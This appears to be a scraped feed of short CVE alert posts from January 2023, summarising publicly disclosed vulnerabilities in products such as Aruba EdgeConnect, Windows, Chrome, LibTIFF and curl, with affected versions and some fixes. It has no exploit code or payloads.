🚨 CVE-2022-43522Multiple vulnerabilities in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an authenticated remote attacker to conduct SQL injection attacks against the Aruba EdgeConnect Enterprise Orchestrator instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database potentially leading to complete compromise of the Aruba EdgeConnect Enterprise Orchestrator host in Aruba EdgeConnect Enterprise Orchestration Software version(s): Aruba EdgeConnect Enterprise Orchestrator (on-premises), Aruba EdgeConnect Enterprise Orchestrator-as-a-Service, Aruba EdgeConnect Enterprise Orchestrator-SP and Aruba EdgeConnect Enterprise Orchestrator Global Enterprise Tenant Orchestrators - Orchestrator 9.2.1.40179 and below, - Orchestrator 9.1.4.40436 and below, - Orchestrator 9.0.7.40110 and below, - Orchestrator 8.10.23.40015 and below, - Any older branches of Orchestrator not specifically mentioned.🎖@cveNotify |
|
| 2023-01-11 18:30:12 |
🚨 CVE-2022-43521Multiple vulnerabilities in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an authenticated remote attacker to conduct SQL injection attacks against the Aruba EdgeConnect Enterprise Orchestrator instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database potentially leading to complete compromise of the Aruba EdgeConnect Enterprise Orchestrator host in Aruba EdgeConnect Enterprise Orchestration Software version(s): Aruba EdgeConnect Enterprise Orchestrator (on-premises), Aruba EdgeConnect Enterprise Orchestrator-as-a-Service, Aruba EdgeConnect Enterprise Orchestrator-SP and Aruba EdgeConnect Enterprise Orchestrator Global Enterprise Tenant Orchestrators - Orchestrator 9.2.1.40179 and below, - Orchestrator 9.1.4.40436 and below, - Orchestrator 9.0.7.40110 and below, - Orchestrator 8.10.23.40015 and below, - Any older branches of Orchestrator not specifically mentioned.🎖@cveNotify |
|
| 2023-01-11 18:30:11 |
🚨 CVE-2023-0055Sensitive Cookie in HTTPS Session Without 'Secure' Attribute in GitHub repository pyload/pyload prior to 0.5.0b3.dev32.🎖@cveNotify |
|
| 2023-01-11 18:30:10 |
🚨 CVE-2023-0057Improper Restriction of Rendered UI Layers or Frames in GitHub repository pyload/pyload prior to 0.5.0b3.dev33.🎖@cveNotify |
|
| 2023-01-11 18:30:09 |
🚨 CVE-2022-43520Multiple vulnerabilities in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an authenticated remote attacker to conduct SQL injection attacks against the Aruba EdgeConnect Enterprise Orchestrator instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database potentially leading to complete compromise of the Aruba EdgeConnect Enterprise Orchestrator host in Aruba EdgeConnect Enterprise Orchestration Software version(s): Aruba EdgeConnect Enterprise Orchestrator (on-premises), Aruba EdgeConnect Enterprise Orchestrator-as-a-Service, Aruba EdgeConnect Enterprise Orchestrator-SP and Aruba EdgeConnect Enterprise Orchestrator Global Enterprise Tenant Orchestrators - Orchestrator 9.2.1.40179 and below, - Orchestrator 9.1.4.40436 and below, - Orchestrator 9.0.7.40110 and below, - Orchestrator 8.10.23.40015 and below, - Any older branches of Orchestrator not specifically mentioned.🎖@cveNotify |
|
| 2023-01-11 18:30:05 |
🚨 CVE-2022-43534A vulnerability in the ClearPass OnGuard Linux agent could allow malicious users on a Linux instance to elevate their user privileges. A successful exploit could allow these users to execute arbitrary code with root level privileges on the Linux instance in Aruba ClearPass Policy Manager version(s): ClearPass Policy Manager 6.10.x: 6.10.7 and below and ClearPass Policy Manager 6.9.x: 6.9.12 and below.🎖@cveNotify |
|
| 2023-01-11 18:30:04 |
🚨 CVE-2022-43527Multiple vulnerabilities within the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim's browser in the context of the affected interface in Aruba EdgeConnect Enterprise Orchestration Software version(s): Aruba EdgeConnect Enterprise Orchestrator (on-premises), Aruba EdgeConnect Enterprise Orchestrator-as-a-Service, Aruba EdgeConnect Enterprise Orchestrator-SP and Aruba EdgeConnect Enterprise Orchestrator Global Enterprise Tenant Orchestrators - Orchestrator 9.2.1.40179 and below, - Orchestrator 9.1.4.40436 and below, - Orchestrator 9.0.7.40110 and below, - Orchestrator 8.10.23.40015 and below, - Any older branches of Orchestrator not specifically mentioned.🎖@cveNotify |
|
| 2023-01-11 18:30:03 |
🚨 CVE-2022-43523Multiple vulnerabilities in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an authenticated remote attacker to conduct SQL injection attacks against the Aruba EdgeConnect Enterprise Orchestrator instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database potentially leading to complete compromise of the Aruba EdgeConnect Enterprise Orchestrator host in Aruba EdgeConnect Enterprise Orchestration Software version(s): Aruba EdgeConnect Enterprise Orchestrator (on-premises), Aruba EdgeConnect Enterprise Orchestrator-as-a-Service, Aruba EdgeConnect Enterprise Orchestrator-SP and Aruba EdgeConnect Enterprise Orchestrator Global Enterprise Tenant Orchestrators - Orchestrator 9.2.1.40179 and below, - Orchestrator 9.1.4.40436 and below, - Orchestrator 9.0.7.40110 and below, - Orchestrator 8.10.23.40015 and below, - Any older branches of Orchestrator not specifically mentioned.🎖@cveNotify |
|
| 2023-01-11 18:30:02 |
🚨 CVE-2023-22622WordPress through 6.1.1 depends on unpredictable client visits to cause wp-cron.php execution and the resulting security updates, and the source code describes "the scenario where a site may not receive enough visits to execute scheduled tasks in a timely manner," but neither the installation guide nor the security guide mentions this default behavior, or alerts the user about security risks on installations with very few visits.🎖@cveNotify |
|
| 2023-01-11 18:30:01 |
🚨 CVE-2022-43529A vulnerability in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an remote attacker to persist a session after a password reset or similar session clearing event. Successful exploitation of this vulnerability could allow an authenticated attacker to remain on the system with the permissions of their current session after the session should be invalidated in Aruba EdgeConnect Enterprise Orchestration Software version(s): Aruba EdgeConnect Enterprise Orchestrator (on-premises), Aruba EdgeConnect Enterprise Orchestrator-as-a-Service, Aruba EdgeConnect Enterprise Orchestrator-SP and Aruba EdgeConnect Enterprise Orchestrator Global Enterprise Tenant Orchestrators - Orchestrator 9.2.1.40179 and below, - Orchestrator 9.1.4.40436 and below, - Orchestrator 9.0.7.40110 and below, - Orchestrator 8.10.23.40015 and below, - Any older branches of Orchestrator not specifically mentioned.🎖@cveNotify |
|
| 2023-01-11 18:30:00 |
🚨 CVE-2022-43533A vulnerability in the ClearPass OnGuard macOS agent could allow malicious users on a macOS instance to elevate their user privileges. A successful exploit could allow these users to execute arbitrary code with root level privileges on the macOS instance in Aruba ClearPass Policy Manager version(s): ClearPass Policy Manager 6.10.x: 6.10.7 and below and ClearPass Policy Manager 6.9.x: 6.9.12 and below.🎖@cveNotify |
|
| 2023-01-11 18:29:59 |
🚨 CVE-2017-20168A vulnerability was found in jfm-so piWallet. It has been rated as critical. Affected by this issue is some unknown functionality of the file api.php. The manipulation of the argument key leads to sql injection. The name of the patch is b420f8c4cbe7f06a34d1b05e90ee5cdfe0aa83bb. It is recommended to apply a patch to fix this issue. VDB-218006 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-11 18:29:58 |
🚨 CVE-2022-47859Lead Management System v1.0 is vulnerable to SQL Injection via the user_id parameter in changePassword.php.🎖@cveNotify |
|
| 2023-01-11 18:29:57 |
🚨 CVE-2014-125074A vulnerability was found in Nayshlok Voyager. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file Voyager/src/models/DatabaseAccess.java. The manipulation leads to sql injection. The name of the patch is f1249f438cd8c39e7ef2f6c8f2ab76b239a02fae. It is recommended to apply a patch to fix this issue. The identifier VDB-218005 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-11 18:29:56 |
🚨 CVE-2022-47860Lead Management System v1.0 is vulnerable to SQL Injection via the id parameter in removeProduct.php.🎖@cveNotify |
|
| 2023-01-11 07:30:11 |
🚨 CVE-2023-22958The Syracom Secure Login plugin before 3.1.1.0 for Jira may allow spoofing of 2FA PIN validation via the plugins/servlet/twofactor/public/pinvalidation target parameter.🎖@cveNotify |
|
| 2023-01-11 07:30:10 |
🚨 CVE-2022-43390A command injection vulnerability in the CGI program of Zyxel NR7101 firmware prior to V1.15(ACCC.3)C0, which could allow an authenticated attacker to execute some OS commands on a vulnerable device by sending a crafted HTTP request.🎖@cveNotify |
|
| 2023-01-11 07:30:09 |
🚨 CVE-2022-43392A buffer overflow vulnerability in the parameter of web server in Zyxel NR7101 firmware prior to V1.15(ACCC.3)C0, which could allow an authenticated attacker to cause denial-of-service (DoS) conditions by sending a crafted authorization request.🎖@cveNotify |
|
| 2023-01-11 07:30:08 |
🚨 CVE-2023-0049Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.1143.🎖@cveNotify |
|
| 2023-01-11 07:30:06 |
🚨 CVE-2022-46392An issue was discovered in Mbed TLS before 2.28.2 and 3.x before 3.3.0. An adversary with access to precise enough information about memory accesses (typically, an untrusted operating system attacking a secure enclave) can recover an RSA private key after observing the victim performing a single private-key operation, if the window size (MBEDTLS_MPI_WINDOW_SIZE) used for the exponentiation is 3 or smaller.🎖@cveNotify |
|
| 2023-01-11 07:30:05 |
🚨 CVE-2022-46393An issue was discovered in Mbed TLS before 2.28.2 and 3.x before 3.3.0. There is a potential heap-based buffer overflow and heap-based buffer over-read in DTLS if MBEDTLS_SSL_DTLS_CONNECTION_ID is enabled and MBEDTLS_SSL_CID_IN_LEN_MAX > 2 * MBEDTLS_SSL_CID_OUT_LEN_MAX.🎖@cveNotify |
|
| 2023-01-11 07:30:04 |
🚨 CVE-2022-45939GNU Emacs through 28.2 allows attackers to execute commands via shell metacharacters in the name of a source-code file, because lib-src/etags.c uses the system C library function in its implementation of the ctags program. For example, a victim may use the "ctags *" command (suggested in the ctags documentation) in a situation where the current working directory has contents that depend on untrusted input.🎖@cveNotify |
|
| 2023-01-11 07:30:02 |
🚨 CVE-2022-39379Fluentd collects events from various data sources and writes them to files, RDBMS, NoSQL, IaaS, SaaS, Hadoop and so on. A remote code execution (RCE) vulnerability in non-default configurations of Fluentd allows unauthenticated attackers to execute arbitrary code via specially crafted JSON payloads. Fluentd setups are only affected if the environment variable `FLUENT_OJ_OPTION_MODE` is explicitly set to `object`. Please note: The option FLUENT_OJ_OPTION_MODE was introduced in Fluentd version 1.13.2. Earlier versions of Fluentd are not affected by this vulnerability. This issue was patched in version 1.15.3. As a workaround do not use `FLUENT_OJ_OPTION_MODE=object`.🎖@cveNotify |
|
| 2023-01-11 07:30:01 |
🚨 CVE-2023-22467Luxon is a library for working with dates and times in JavaScript. On the 1.x branch prior to 1.38.1, the 2.x branch prior to 2.5.2, and the 3.x branch on 3.2.1, Luxon's `DateTime.fromRFC2822() has quadratic (N^2) complexity on some specific inputs. This causes a noticeable slowdown for inputs with lengths above 10k characters. Users providing untrusted data to this method are therefore vulnerable to (Re)DoS attacks. This issue also appears in Moment as CVE-2022-31129. Versions 1.38.1, 2.5.2, and 3.2.1 contain patches for this issue. As a workaround, limit the length of the input.🎖@cveNotify |
|
| 2023-01-11 07:30:00 |
🚨 CVE-2022-45052A Local File Inclusion vulnerability has been found in Axiell Iguana CMS. Due to insufficient neutralisation of user input on the url parameter on the Proxy.type.php endpoint, external users are capable of accessing files on the server.🎖@cveNotify |
|
| 2023-01-11 07:29:58 |
🚨 CVE-2022-45051A reflected XSS vulnerability has been found in Axiell Iguana CMS, allowing an attacker to execute code in a victim's browser. The module parameter on the Service.template.cls endpoint does not properly neutralise user input, resulting in the vulnerability.🎖@cveNotify |
|
| 2023-01-11 07:29:57 |
🚨 CVE-2022-45049A reflected XSS vulnerability has been found in Axiell Iguana CMS, allowing an attacker to execute code in a victim's browser. The url parameter on the novelist.php endpoint does not properly neutralise user input, resulting in the vulnerability.🎖@cveNotify |
|
| 2023-01-11 07:29:56 |
🚨 CVE-2021-38928IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.1 uses Cross-Origin Resource Sharing (CORS) which could allow an attacker to carry out privileged actions and retrieve sensitive information as the domain name is not being limited to only trusted domains. IBM X-Force ID: 210323.🎖@cveNotify |
|
| 2023-01-11 07:29:55 |
🚨 CVE-2022-34330IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 229469.🎖@cveNotify |
|
| 2023-01-11 07:29:54 |
🚨 CVE-2022-22371IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.1 does not invalidate session after a password change which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 221195.🎖@cveNotify |
|
| 2023-01-11 07:29:52 |
🚨 CVE-2022-44426In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-11 07:29:51 |
🚨 CVE-2022-44427In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-11 07:29:50 |
🚨 CVE-2022-44428In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-11 07:29:49 |
🚨 CVE-2022-44429In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-11 07:29:48 |
🚨 CVE-2023-22465Http4s is a Scala interface for HTTP services. Starting with version 0.1.0 and prior to versions 0.21.34, 0.22.15, 0.23.17, and 1.0.0-M38, the `User-Agent` and `Server` header parsers are susceptible to a fatal error on certain inputs. In http4s, modeled headers are lazily parsed, so this only applies to services that explicitly request these typed headers. Fixes are released in 0.21.34, 0.22.15, 0.23.17, and 1.0.0-M38. As a workaround, use the weakly typed header interface.🎖@cveNotify |
|
| 2023-01-11 00:30:01 |
🚨 CVE-2023-21532Windows GDI Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21552.🎖@cveNotify |
|
| 2023-01-11 00:30:00 |
🚨 CVE-2023-21524Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-01-11 00:29:59 |
🚨 CVE-2023-21755Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774.🎖@cveNotify |
|
| 2023-01-11 00:29:58 |
🚨 CVE-2023-21531Azure Service Fabric Container Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-01-11 00:29:57 |
🚨 CVE-2023-21527Windows iSCSI Service Denial of Service Vulnerability.🎖@cveNotify |
|
| 2023-01-11 00:29:56 |
🚨 CVE-2023-21536Event Tracing for Windows Information Disclosure Vulnerability. This CVE ID is unique from CVE-2023-21753.🎖@cveNotify |
|
| 2023-01-11 00:29:55 |
🚨 CVE-2023-21536Event Tracing for Windows Information Disclosure Vulnerability. This CVE ID is unique from CVE-2023-21753.🎖@cveNotify |
|
| 2023-01-11 00:29:54 |
🚨 CVE-2023-21535Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21548.🎖@cveNotify |
|
| 2023-01-11 00:29:52 |
🚨 CVE-2023-21764Microsoft Exchange Server Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21763.🎖@cveNotify |
|
| 2023-01-11 00:29:47 |
🚨 CVE-2023-21539Windows Authentication Remote Code Execution Vulnerability.🎖@cveNotify |
|
| 2023-01-11 00:29:46 |
🚨 CVE-2023-21539Windows Authentication Remote Code Execution Vulnerability.🎖@cveNotify |
|
| 2023-01-11 00:29:45 |
🚨 CVE-2023-21765Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21678, CVE-2023-21760.🎖@cveNotify |
|
| 2023-01-11 00:29:44 |
🚨 CVE-2023-21540Windows Cryptographic Information Disclosure Vulnerability. This CVE ID is unique from CVE-2023-21550, CVE-2023-21559.🎖@cveNotify |
|
| 2023-01-11 00:29:39 |
🚨 CVE-2023-21543Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21546, CVE-2023-21555, CVE-2023-21556, CVE-2023-21679.🎖@cveNotify |
|
| 2023-01-11 00:29:38 |
🚨 CVE-2023-21542Windows Installer Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-01-11 00:29:37 |
🚨 CVE-2023-21547Internet Key Exchange (IKE) Protocol Denial of Service Vulnerability.🎖@cveNotify |
|
| 2023-01-11 00:29:36 |
🚨 CVE-2023-21549Windows SMB Witness Service Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-01-10 22:30:06 |
🚨 CVE-2023-0134Use after free in Cart in Google Chrome prior to 109.0.5414.74 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via database corruption and a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-01-10 22:30:05 |
🚨 CVE-2023-0128Use after free in Overview Mode in Google Chrome on Chrome OS prior to 109.0.5414.74 allowed a remote attacker who convinced a user to engage in specific UI interactions to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-01-10 22:30:04 |
🚨 CVE-2023-0130Inappropriate implementation in in Fullscreen API in Google Chrome on Android prior to 109.0.5414.74 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-01-10 22:30:00 |
🚨 CVE-2023-0138Heap buffer overflow in libphonenumber in Google Chrome prior to 109.0.5414.74 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-01-10 22:29:59 |
🚨 CVE-2023-0132Inappropriate implementation in in Permission prompts in Google Chrome on Windows prior to 109.0.5414.74 allowed a remote attacker to force acceptance of a permission prompt via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-01-10 22:29:58 |
🚨 CVE-2023-0139Insufficient validation of untrusted input in Downloads in Google Chrome on Windows prior to 109.0.5414.74 allowed a remote attacker to bypass download restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-01-10 22:29:55 |
🚨 CVE-2023-0140Inappropriate implementation in in File System API in Google Chrome on Windows prior to 109.0.5414.74 allowed a remote attacker to bypass file system restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-01-10 22:29:54 |
🚨 CVE-2022-45199Pillow before 9.3.0 allows denial of service via SAMPLESPERPIXEL.🎖@cveNotify |
|
| 2023-01-10 22:29:53 |
🚨 CVE-2018-25049A vulnerability was found in email-existence. It has been rated as problematic. Affected by this issue is some unknown functionality of the file index.js. The manipulation leads to inefficient regular expression complexity. The name of the patch is 0029ba71b6ad0d8ec0baa2ecc6256d038bdd9b56. It is recommended to apply a patch to fix this issue. VDB-216854 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-10 22:29:50 |
🚨 CVE-2022-46457NASM v2.16 was discovered to contain a segmentation violation in the component ieee_write_file at /output/outieee.c.🎖@cveNotify |
|
| 2023-01-10 22:29:49 |
🚨 CVE-2022-4141Heap based buffer overflow in vim/vim 9.0.0946 and below by allowing an attacker to CTRL-W gf in the expression used in the RHS of the substitute command.🎖@cveNotify |
|
| 2023-01-10 22:29:48 |
🚨 CVE-2022-43983Browsershot version 3.57.2 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate that the HTML content passed to the Browsershot::html method does not contain URL's that use the file:// protocol.🎖@cveNotify |
|
| 2023-01-10 20:30:14 |
🚨 CVE-2022-42777In power management service, there is a missing permission check. This could lead to set up power management service with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-01-10 20:30:12 |
🚨 CVE-2022-23506Spinnaker is an open source, multi-cloud continuous delivery platform for releasing software changes, and Spinnaker's Rosco microservice produces machine images. Rosco prior to versions 1.29.2, 1.28.4, and 1.27.3 does not property mask secrets generated via packer builds. This can lead to exposure of sensitive AWS credentials in packer log files. Versions 1.29.2, 1.28.4, and 1.27.3 of Rosco contain fixes for this issue. A workaround is available. It's recommended to use short lived credentials via role assumption and IAM profiles. Additionally, credentials can be set in `/home/spinnaker/.aws/credentials` and `/home/spinnaker/.aws/config` as a volume mount for Rosco pods vs. setting credentials in roscos bake config properties. Last even with those it's recommend to use IAM Roles vs. long lived credentials. This drastically mitigates the risk of credentials exposure. If users have used static credentials, it's recommended to purge any bake logs for AWS, evaluate whether AWS_ACCESS_KEY, SECRET_KEY and/or other sensitive data has been introduced in log files and bake job logs. Then, rotate these credentials and evaluate potential improper use of those credentials.🎖@cveNotify |
|
| 2023-01-10 20:30:11 |
🚨 CVE-2023-0046Improper Restriction of Names for Files and Other Resources in GitHub repository lirantal/daloradius prior to master-branch.🎖@cveNotify |
|
| 2023-01-10 20:30:10 |
🚨 CVE-2022-44432In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-10 20:30:09 |
🚨 CVE-2022-44431In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-10 20:30:05 |
🚨 CVE-2023-0049Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.1143.🎖@cveNotify |
|
| 2023-01-10 20:30:04 |
🚨 CVE-2022-45875Improper validation of script alert plugin parameters in Apache DolphinScheduler to avoid remote command execution vulnerability. This issue affects Apache DolphinScheduler version 3.0.1 and prior versions; version 3.1.0 and prior versions.🎖@cveNotify |
|
| 2023-01-10 20:30:03 |
🚨 CVE-2022-44442In wlan driver, there is a possible missing bounds check, This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-10 20:30:02 |
🚨 CVE-2022-34669NVIDIA GPU Display Driver for Windows contains a vulnerability in the user mode layer, where an unprivileged regular user can access or modify system files or other files that are critical to the application, which may lead to code execution, denial of service, escalation of privileges, information disclosure, or data tampering.🎖@cveNotify |
|
| 2023-01-10 20:29:58 |
🚨 CVE-2023-0048Code Injection in GitHub repository lirantal/daloradius prior to master-branch.🎖@cveNotify |
|
| 2023-01-10 20:29:57 |
🚨 CVE-2022-38753This update resolves a multi-factor authentication bypass attack🎖@cveNotify |
|
| 2023-01-10 20:29:56 |
🚨 CVE-2022-3614In affected versions of Octopus Deploy users of certain browsers using AD to sign-in to Octopus Server were able to bypass authentication checks and be redirected to the configured redirect url without any validation.🎖@cveNotify |
|
| 2023-01-10 20:29:55 |
🚨 CVE-2022-4780ISOS firmwares from versions 1.81 to 2.00 contain hardcoded credentials from embedded StreamX installer that integrators are not forced to change.🎖@cveNotify |
|
| 2023-01-10 20:29:51 |
🚨 CVE-2022-44440In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-10 20:29:50 |
🚨 CVE-2022-44445In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-10 20:29:49 |
🚨 CVE-2022-44446In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-10 20:29:48 |
🚨 CVE-2022-44444In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-01-10 20:29:47 |
🚨 CVE-2022-32665In Boa, there is a possible command injection due to improper input validation. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: A20220026; Issue ID: OSBNB00144124.🎖@cveNotify |
|
| 2023-01-10 18:30:07 |
🚨 CVE-2022-44439In messaging service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-01-10 18:30:06 |
🚨 CVE-2022-38723Gravitee API Management before 3.15.13 allows path traversal through HTML injection.🎖@cveNotify |
|
| 2023-01-10 18:30:04 |
🚨 CVE-2014-125073A vulnerability was found in mapoor voteapp. It has been rated as critical. Affected by this issue is the function create_poll/do_poll/show_poll/show_refresh of the file app.py. The manipulation leads to sql injection. The name of the patch is b290c21a0d8bcdbd55db860afd3cadec97388e72. It is recommended to apply a patch to fix this issue. VDB-217790 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-10 18:30:03 |
🚨 CVE-2022-42716An issue was discovered in the Arm Mali GPU Kernel Driver. There is a use-after-free. A non-privileged user can make improper GPU processing operations to gain access to already freed memory. This affects Valhall r29p0 through r40P0.🎖@cveNotify |
|
| 2023-01-10 18:30:02 |
🚨 CVE-2022-32221When doing HTTP(S) transfers, libcurl might erroneously use the read callback (`CURLOPT_READFUNCTION`) to ask for data to send, even when the `CURLOPT_POSTFIELDS` option has been set, if the same handle previously was used to issue a `PUT` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent `POST` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST.🎖@cveNotify |
|
| 2023-01-10 18:30:00 |
🚨 CVE-2022-35260curl can be told to parse a `.netrc` file for credentials. If that file endsin a line with 4095 consecutive non-white space letters and no newline, curlwould first read past the end of the stack-based buffer, and if the readworks, write a zero byte beyond its boundary.This will in most cases cause a segfault or similar, but circumstances might also cause different outcomes.If a malicious user can provide a custom netrc file to an application or otherwise affect its contents, this flaw could be used as denial-of-service.🎖@cveNotify |
|
| 2023-01-10 18:29:59 |
🚨 CVE-2022-37966Windows Kerberos RC4-HMAC Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-01-10 18:29:58 |
🚨 CVE-2022-37967Windows Kerberos Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-01-10 18:29:56 |
🚨 CVE-2022-38023Netlogon RPC Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-01-10 18:29:55 |
🚨 CVE-2022-3597LibTIFF 4.4.0 has an out-of-bounds write in _TIFFmemcpy in libtiff/tif_unix.c:346 when called from extractImageSection, tools/tiffcrop.c:6826, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 236b7191.🎖@cveNotify |
|
| 2023-01-10 18:29:53 |
🚨 CVE-2022-3598LibTIFF 4.4.0 has an out-of-bounds write in extractContigSamplesShifted24bits in tools/tiffcrop.c:3604, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit cfbb883b.🎖@cveNotify |
|
| 2023-01-10 18:29:52 |
🚨 CVE-2022-3599LibTIFF 4.4.0 has an out-of-bounds read in writeSingleSection in tools/tiffcrop.c:7345, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit e8131125.🎖@cveNotify |
|
| 2023-01-10 18:29:50 |
🚨 CVE-2022-3626LibTIFF 4.4.0 has an out-of-bounds write in _TIFFmemset in libtiff/tif_unix.c:340 when called from processCropSelections, tools/tiffcrop.c:7619, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 236b7191.🎖@cveNotify |
|
| 2023-01-10 18:29:49 |
🚨 CVE-2022-3627LibTIFF 4.4.0 has an out-of-bounds write in _TIFFmemcpy in libtiff/tif_unix.c:346 when called from extractImageSection, tools/tiffcrop.c:6860, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 236b7191.🎖@cveNotify |
|
| 2023-01-10 18:29:48 |
🚨 CVE-2021-22600A double free bug in packet_set_ring() in net/packet/af_packet.c can be exploited by a local user through crafted syscalls to escalate privileges or deny service. We recommend upgrading kernel past the effected versions or rebuilding past ec6af094ea28f0f2dda1a6a33b14cd57e36a9755🎖@cveNotify |
|
| 2023-01-10 18:29:47 |
🚨 CVE-2022-42710Nice (formerly Nortek) Linear eMerge E3-Series 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e devices are vulnerable to Stored Cross-Site Scripting (XSS).🎖@cveNotify |
|
| 2023-01-10 18:29:46 |
🚨 CVE-2022-42435IBM Business Automation Workflow 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, and 22.0.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 238054.🎖@cveNotify |
|
| 2023-01-10 18:29:44 |
🚨 CVE-2022-38682In contacts service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-01-10 18:29:43 |
🚨 CVE-2022-38683In contacts service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-01-10 18:29:41 |
🚨 CVE-2022-38684In contacts service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-01-10 15:29:47 |
🚨 CVE-2022-3792This issue affects: Terminal Operating System versions before 5.0.13🎖@cveNotify |
|
| 2023-01-10 15:29:46 |
🚨 CVE-2022-4661072crm v9 was discovered to contain an arbitrary file upload vulnerability via the avatar upload function. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.🎖@cveNotify |
|
| 2023-01-10 15:29:45 |
🚨 CVE-2022-4422This issue affects:Bulutses Bilgi Teknolojileri LTD. ÅžTÄ°. BULUTDESK CALLCENTERversions prior to 3.0.🎖@cveNotify |
|
| 2023-01-10 15:29:44 |
